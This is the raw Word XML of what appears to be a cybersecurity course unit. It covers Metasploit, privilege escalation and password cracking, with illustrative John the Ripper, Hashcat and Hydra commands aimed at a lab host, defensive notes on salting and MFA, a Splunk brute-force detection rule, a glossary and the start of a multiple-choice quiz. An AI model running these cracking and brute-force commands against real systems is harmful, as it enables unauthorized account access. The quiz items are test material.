          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Illustrative commands</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">john --show hashes.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt   # -m 0 = MD5</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">hydra -l msfadmin -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.102</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.56.102 http-post-form \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  "/dvwa/login.php:username=^USER^&amp;password=^PASS^:Login failed"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Why MD5 and salting matter (observation questions)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Why is MD5 insufficient for password storage, and what should be used instead?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> MD5 is fast to compute, which is exactly the wrong property for password hashing — it lets an attacker try billions of guesses per second with commodity GPUs, and large precomputed rainbow tables exist for unsalted MD5. Modern applications should use slow, purpose-built password hashing algorithms such as </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">bcrypt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">scrypt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Argon2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, which are deliberately slow and support per-password salts and configurable work factors.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Why does salting dramatically increase cracking time even with the same dictionary?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> A </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">salt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> is random data added to each password before hashing, so two users with the same password get different hashes. This defeats precomputed tables (like rainbow tables) entirely and forces the attacker to crack each password individually from scratch, rather than reusing one table against every hash in the database — multiplying the total work by the number of accounts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:left w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:bottom w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:right w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E7B45"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">⚑ Defensive Measures</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Account lockout after repeated failures, rate limiting on login endpoints, multi-factor authentication (MFA), monitoring/alerting on failed-login spikes, and enforcing strong, unique passwords (or passphrase policies) are the standard defences against both offline cracking and online brute force.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — A Splunk detection rule for SSH brute force (observation question)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">A simple SPL search such as </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">index=linux sourcetype=auth "Failed password" | stats count by src_ip | where count &gt; 20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> over a 5-minute window would flag an IP generating many failed SSH logins in a short time. In a real Splunk deployment this would be saved as an alert with a threshold (e.g. more than 20 failures from one source in 5 minutes) that notifies the SOC and can trigger automatic blocking.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Unit Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit organises exploitation into auxiliary, exploit, payload, encoder, NOP and post modules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole workflow: search → use → show options → set → run, with RHOST/RPORT (target) and LHOST/LPORT (attacker/listener).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Staged payloads send a small stager first; stageless payloads are self-contained in one piece.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter commands (sysinfo, getuid, ps, hashdump, etc.) support post-exploitation once a session exists.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux privilege escalation: sudo -l, SUID binaries + GTFOBins, reading /etc/shadow as proof of root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows privilege escalation: unquoted service paths, weak registry permissions, getsystem token impersonation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">John the Ripper and Hashcat crack offline hashes; Hydra brute-forces live login services; salting and slow hash algorithms (bcrypt/Argon2) are the core defences.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Important Definitions &amp; Terminology</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2437"/>
        <w:gridCol w:w="7309"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7309"/>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Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Meterpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="730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An advanced, in-memory Metasploit payload providing a rich post-exploitation command environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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SUID bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7309"/>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 file permission that makes a program always run with its owner's privileges, regardless of who executes it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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GTFOBins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="730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 public catalogue of standard Unix binaries and how each can be abused for privilege escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Staged payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7309"/>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 payload delivered in two parts: a small stager, then the full payload downloaded over the connection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Rainbow table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="730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 precomputed table of hash-to-plaintext mappings used to speed up cracking of unsalted hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Salt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7309"/>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Random data added to a password before hashing so identical passwords produce different hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Multiple-Choice Questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Which Metasploit module type carries the code that actually runs on the target after a successful exploit?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Auxiliary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Encoder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> NOP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> In msfconsole, which variable represents the attacker's own listening address for a reverse payload?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
